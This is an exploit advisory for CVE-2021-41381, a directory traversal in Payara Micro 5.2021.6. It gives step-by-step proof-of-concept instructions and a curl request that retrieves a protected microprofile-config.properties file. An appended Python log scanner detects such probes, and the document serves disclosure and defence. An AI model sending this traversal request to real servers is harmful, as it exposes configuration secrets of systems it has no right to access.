# Exploit Title: Payara Micro Community 5.2021.6 Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
Proof of Concept:
Step 1: Open the browser and check the version of the Payara software.
Step 2: Add this path at the end of the URL: /.//WEB-INF/classes/META-INF/microprofile-config.properties
Step 3: Check the response for a match containing "payara.security.openid.default.providerURI=" or
"payara.security.openid.sessionScopedConfiguration=true"
Step 4: If any of these strings appears in the response, the application is vulnerable to directory traversal.
Step 5: Alternatively, use curl with this command:
Request:
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties
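
Detection: the request above leaves a recognisable entry in the HTTP access log. The following log check is an added example, not part of the original advisory or of Payara; it assumes Common/Combined Log Format, and the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Request line and status from a Common/Combined Log Format entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Deployment-internal directories that a servlet container must never serve.
PROTECTED_RE = re.compile(r"/(WEB-INF|META-INF)(/|$)", re.IGNORECASE)
# Segments a normalizing client removes before sending: "//", "/./", "/../".
UNNORMALIZED_RE = re.compile(r"//|/\.{1,2}(/|$)")

CONFIG = "WEB-INF/classes/META-INF/microprofile-config.properties"
# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    f'203.0.113.7 - - [01/Oct/2021:10:00:05 +0000] "GET /.//{CONFIG} HTTP/1.1" 200 340',
    f'203.0.113.8 - - [01/Oct/2021:10:02:11 +0000] "GET /.//{CONFIG} HTTP/1.1" 404 0',
    f'203.0.113.9 - - [01/Oct/2021:10:03:40 +0000] "GET /{CONFIG} HTTP/1.1" 404 0',
]


def classify(line):
    """Return (verdict, path) for a request touching a protected directory, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Drop the query string and percent-decode before matching.
    path = unquote(m.group("target").split("?", 1)[0])
    if not PROTECTED_RE.search(path):
        return None
    if m.group("status").startswith("2"):
        return ("served", path)   # protected content was returned: investigate
    if UNNORMALIZED_RE.search(path):
        return ("probe", path)    # un-normalized path aimed at a protected dir
    return ("blocked", path)      # plain request, refused by the container


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit is not None]


if __name__ == "__main__":
    for verdict, path in scan(SAMPLE_LOG):
        print(f"{verdict:8} {path}")
```

A "served" verdict means the configuration file left the server and any values in it should be treated as disclosed.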